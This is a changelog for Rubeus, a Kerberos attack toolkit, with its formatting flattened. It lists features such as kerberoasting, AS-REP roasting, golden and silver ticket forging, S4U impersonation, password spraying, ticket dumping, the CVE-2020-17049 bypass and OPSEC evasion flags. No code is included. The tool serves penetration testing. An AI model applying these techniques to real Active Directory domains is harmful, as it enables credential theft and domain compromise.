All notable changes to this project will be documented in this file.
The format is based on Keep a Changelog, and this project adheres to Semantic Versioning.
/nofullpacsig
switch to thesilver
command to exclude the inclusion of the new FullPacChecksum in service tickets (@0xe7)/extendedupndns
switch to bothgolden
andsilver
to include the extended version of the UpnDsn info buffer (0xe7)- automated including proper UPN exists flag (1 or 0) within UpnDns info buffer based on LDAP results (0xe7)
- default UpnDns Flag from 0 (UPN_SET) to 1 (NO_UPN_SET) in
golden
andsilver
(0xe7)
- typos for
kerberos
usage, changed from/preauth
to/nopreauth
(0xe7) - parsing of logoncount and badpwdcount from LDAP with exception handling and set to 0 if exception happens (0xe7)
preauthscan
command to scan for accounts that do not require Kerberos pre-authentication/preauth
argument to thekerberoast
command, to kerberoast with an account that does not require Kerberos pre-authentication/nopreauth
flag to theasktgt
command, to request a TGT without providing pre-authentication/service
argument to theasktgt
command, to request service tickets using an AS-REQ
logonsession
command to list information about the current logon session
- A
/debug
flag that outputs base64 encodings of the inputs to/outputs from the ASN.1 decoding/encoding functions /createnetonly
parameter to S4U (@tyranid)/ticket
option to createnetonly to import a ticket into the new process without requiring privileges (@tyranid)
- Handling for KERB_ERRORs
- Support for making requests through a KDC proxy using the
/proxyurl:
argument forasktgt
,asktgs
ands4u
(@0xe7)
KDC_ERR_SVC_UNAVAILABLE
KERBEROS_ERROR, addedKDC_ERR_MUST_USE_USER2USER
andKDC_ERR_PATH_NOT_ACCEPTED
(@0xe7)
- Full PAC encoding/decoding (@CCob & @0xe7)
golden
andsilver
commands for ticket forging with/ldap
switch to automate retrieving PAC information (@CCob & @0xe7)Networking.GetLdapConnection
with LDAPS support usingLdapConnection
(forkerberoast
/asreproast
/golden
/silver
) (@0xe7)/getcredentials
forasktgt
(sends U2U request and automatically extracts NT hash) (@0xe7)/u2u
forasktgs
to send User-to-User requests (@0xe7)/targetuser
forasktgs
for sending S4U2self requests (@0xe7)/targetdomain
forasktgs
for forcing a specific domain for the request (@0xe7)/targetuser
forchangepw
for changing the password of other users (upgradedEncKrbPrivPart
to version -128) (@CCob)/servicekey
,/krbkey
and/asrepkey
todescribe
for showing PAC and verifying checksums (@CCob & @0xe7)/serviceuser
and/servicedomain
todescribe
to create crackable "hashes" from AES encrypted tickets (@0xe7)/autoenterprise
now works with the kerberoastingKerberosRequestorSecurityToken.GetRequest
method (@0xe7)/ldaps
tokerberoast
andasreproast
for querying LDAPS (@0xe7)/servicekey
toasktgt
andasktgs
to decrypt the EncTicketPart (@CCob & @0xe7)/krbkey
and/krbenctype
toasktgs
for verifying the KDCChecksum and TicketChecksum (@0xe7)/printargs
switch toasktgs
for printing the arguments required for building a similar PAC withgolden
orsilver
(@0xe7)Networking.GetGptTmplContent
for parsing domain policy files using when forging tickets (and/ldap
is used) (@0xe7)Helpers.GetADObjects
for converting returned LDAP results into a common format (List<IDictionary<string, Object>>
) (0xe7)
- Complete rewrite of
Networking.SendBytes
(@CCob) - Fixed
PA_S4U_X509_USER
pa data section fors4u /opsec
(@0xe7) - Added check after
S4U2self
to throw error if not received, avoids unhandled exception callingS4U2proxy
without a ticket, ons4u
command (@0xe7) - Handled
KDC_ERR_KEY_EXPIRED
forbrute
command (@0xe7)
- Complete rewrite
AuthorizationData
sections (@0xe7) - Added
keyUsage
argument toCrypto.KerberosChecksum
to createPA_S4U_X509_USER
checksum (@0xe7) - Aliased
brute
tospray
(@0xe7) - Changed
System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName
toSystem.DirectoryServices.ActiveDirectory.Domain.GetCurrentDomain().Name
forasktgt
when automatically resolving the domain (works in more situations) (@0xe7)
- Only final cert in chain used to verify when signing PKINIT requests, /verifycerts flag added for full verification
- Replaced /certificate info for help and README
- Adapted/integrated the PR from @RiccardoAncarani for
/delay:MILLISECONDS
and/jitter:%
(1-100) flags forkerberoast
- Rubeus.yar yara rule from FireEye's red team tool countermeasure repo
- arguments can now use
/arg=value
form in addition to/arg:value
- few kerberoasting fixes
- /autoenterprise flag to automate retrying failed kerberoasting attempts (@0xe7)
- support for CVE-2020-17049 using the /bronzebit switch (@0xe7)
- initial support for basic silver tickets, without a PAC (@0xe7)
- Cross domain enterprise principal kerberoasting (@0xe7)
- Kerberoasting using DC IP and supplying a TGT (@0xe7)
- OPSEC
/opsec
switch to makeasktgt
/asktgs
/s4u
build requests more realistic (@0xe7)- Randomized sequence numbers (@0xe7)
- Added proper checksums (@0xe7)
- Added enc-authorization-data to TGS-REQs (@0xe7)
- Don't send AS-REQ when preauth is disabled (@0xe7)
- Automation of requesting forwarded TGT when requesting a service ticket for unconstrained systems (@0xe7)
- Added PA-DATA PA-PAC-OPTIONS to normal TGS-REQ when using
/opsec
(@0xe7)
- Start of smartcard/PKINIT support (@CCob)
/password
support
- Support for
/spns
option when kerberoasting (@0xe7) - Support for NT-Enterprise principals for service ticket requests on both the
asktgs
andkerberoast
commands (@0xe7) - Support for modifying S4U2Self tickets to be able to impersonate any user on the requesting machine (@0xe7)
- Cross-domain
s4u
/asktgs
support (@0xe7) /runfor:X
flag for themonitor
command (@G0ldenGunSec)- IPv6support (@royreinders)
kerberoast /user:X
now takes multiple comma separated values
- Casing fix for AES key salts
- Kerberoasting when using TGT to authenticate but not supplying SPNs (@0xe7)
- GetDCName() issue on non-domain-joined systems
- Nonced randomized
- Fixes for issues from non domain machines (@VbScrub)
- Replaced checks for "NT Authority\System" string with SID comparison
- /rc4opsec service name fix
- LDAP paged searching (@cnotin)
- TGS-REQ AES formatting (@Ion Todd)
-
to any command that outputs base64 ticket blobs
- the universal
/nowrap
argument prevents base64 ticket blobs from being display-wrapped
- the universal
-
the /consoleoutfile argument to redirect console output to a file, and the public
MainString("command")
function to work over PSRemoting (see end of README.md) -
brute action (from @Zer1t0)
- Performs password bruteforcing attacks using raw AS-REQs
-
to triage/klist/dump actions
- More flexible targeting with /user//LUID//service//server/
-
to the kerberoast action
- /pwdsetafter, /pwdsetbefore, and /resultlimit arguments for better targeting (from @pkb1s)
- /stats flag to list statistics of user accounts without actually roasting them
- /ldapfilter argument for adding custom LDAP filters to the user search query
- /simple argument for output file formatting but to the console
-
to the asreproast action
- /ldapfilter argument for adding custom LDAP filters to the user search query
-
to the asktgt/asktgs/s4u actions
- option to save .kirbi file to disk (from @audrummer15)
-
to the s4u action
- the cross-domain s4u support (from @0xe7)
-
currentluid command to display the current logon sesion ID
- LSA.cs got a complete overhaul for reusability and flexibility (thanks for the help @leechristensen !)
- kerberoast action updated to exclude disabled accounts by default
- harvest mode's /interval argument is now in seconds, to match /monitor
- harvest / /monitor modes revamped
- now no longer depend on searching the event logs for 4624 events
- full set of current TGTs are extracted each monitor round
- Some timestamp converting code in the ticket extraction section
- KERB_RETRIEVE_TKT_REQUEST fix for x32 systems (from @0xRCA)
- Fixed AES salt generation (from @monoxgas)
- Fixed accidental ticket request behavior when dumping from LsaCallAuthenticationPackage
- Fixed
renew
command invocation - Fixed
asreproast
LDAP querying (broke at some point)
- tgssub action
- Substitutes in alternate sname (cifs) or SPN (ldap/computer.domain.com) into an existing service ticket
- to asktgs action
- /enctype:[RC4/AES128/AES256/DES] now forces that particular encryption type in the TGS-REQ
- asktgt action
- Returned tickets now run through the describe command
- describe action
- Kerberoast hash now only extracted from RC4_HMAC tickets
- hash action
- hashes a given password to rc4_hmac form, and if /user and /domain supplied, calculates aes128_cts_hmac_sha1, aes256_cts_hmac_sha1, and des_cbc_md5 forms
- kerberoast action
- Fixed query that checks that rc4_hmac is flipped in msds-supportedencryption types, because "lol Microsoft"
- asktgt action
- /aes128 and /aes now supported for /enctype when used with /password
- crypto
- Replaced @qlemaire's PR of Kevin-Robertson' Get-KerberosAESKey hash code with @gentilkiwi's KERB_ECRYPT HashPassword approach
- README
- added @elad_shamir into the references
- kerberoast action
- /rc4opsec option to use tgtdeleg and filter out AES-enabled accounts
- /aes option to AES roast only AES-enabled accounts
- kerberoast action
- Default user query searches for accounts with RC4 enabled
- Default behavior when using the /tgtdeleg flag requests RC4 for ALL accounts (including AES)
- Display "Supported ETypes" in enumerated output
- tgtdeleg action
- Changed the default requested SPN from HOST/dc.domain.com to cifs/dc.domain.com
- Kerberoast hash display for some option combinations
- kerberoast action
- now has /ticket option to use an existing TGT for Kerberoasting
- now has /usetgtdeleg option to use tgtdeleg option as the TGT for Kerberoasting
- LDAP user search path and number of found users now output
- describe action
- Kerberoast hash output now generated for service tickets
- Kerberoast hash display but when /spn and /outfile were specified
- Kerberoast samaccountname now properly put into hash output
- kerberoast action now has /domain and /dc like asreproast action
- kerberoast and asreproast now properly work over domain trusts
- triage command now works for the current non-elevated user, outputting current LUID as well
- Current LUID output also added for non-elevated dump and klist commands
- Added Opsec section in README.md
- Landed @leechristensen's cleanup of the Monitor4624 code
- Restructed the README.md to match the help output, updated all examples, added table of contents
- triage action
- Quickly triages the users and present tickets on a machine
- dump and klist changed default LUID output to hex format
- kerberoast and asreproast actions
- Added /outfile:X to output hashes to a file, one hash per line
- asreproast changed asreproast's default behavior to match kerberoast
- Clustered the default output help menu around function (things were getting crowded)
- Changed underlying LUID logic to handle UInt64s
- klist action
- lists current user's (or if elevated, all users') ticket information
- s4u landed @eladshamir's pull requests
- RBCD support
- support loading TGS from Kirbi to skip S4U2Self and perform S4U2Proxy only
- perform S4U2Self only
- print output for each stage
- asreproast landed @rvrsh3ll's pull request
- added hashcat output format
- asktgt landed @qlemaire's pull request
- now accepts a /password:X parameter
- monitor and harvest landed @djhohnstein's pull request
- ticket extraction can now be saved to the registry with the "/registry:X" flag
- dump display of service tickets with multiple slashes
- response buffer size in lib/Networking.cs increased for large ticket responses
- landed @BlueSkeye's fixes for PTT bug fix, TicketFlags display, and dead code removal in PA_DATA.Encode
- Merged @mark-s' PR that broke out Program.cs' commands into 'Command' classes for easier command addition.
- Commands that pass /dc:X are now passed through Networking.GetDCIP(), which resolves the DC name (if null) and returns the DC IP. Code refactored to use this centralized resolver.
- The /user:USER flag can now be /user:DOMAIN.COM\USER (auto-completes /domain:Y).
- The harvest command now returns the user ticket with the latest renew_till time on intial extraction.
- changepw action
- implements the AoratoPw user password reset from a TGT .kirbi
- equivalent to Kekeo's misc::changepw function
- asktgs action - takes /ptt:X, /dc:X, /ticket:X flags like asktgt, /service:X takes one or more SPN specifications
- tgtdeleg action - reimplements @gentilkiwi's Kekeo tgt::deleg function
- uses the GSS-API Kerberos specification (RFC 4121) to request a "fake" delegation context that stores a KRB-CRED in the Authenticator Checksum. Combined with extracting the service session key from the local cache, this allows us to recover usable TGTs for the current user without elevation.
- Added CHANGELOG.md
- s4u action now accepts multiple alternate snames (/altservice:X,Y,...)
- This executes the S4U2self/S4U2proxy process only once, and substitutes the multiple alternate service names into the final resulting service ticket structure(s) for as many snames as specified
- asreproast action
- added eventual hashcat output format, use "/format:<john/hashcat>" (default of "john")
- dump action now correctly extracts ServiceName/TargetName strings
- asreproast action - fixed salt demarcation line for "asreproast" hashes
- kerberoast action
- Added reference for @machsosec for the KerberosRequestorSecurityToken.GetRequest Kerberoasting Method()
- Corrected encType extraction for the hash output
- Initial release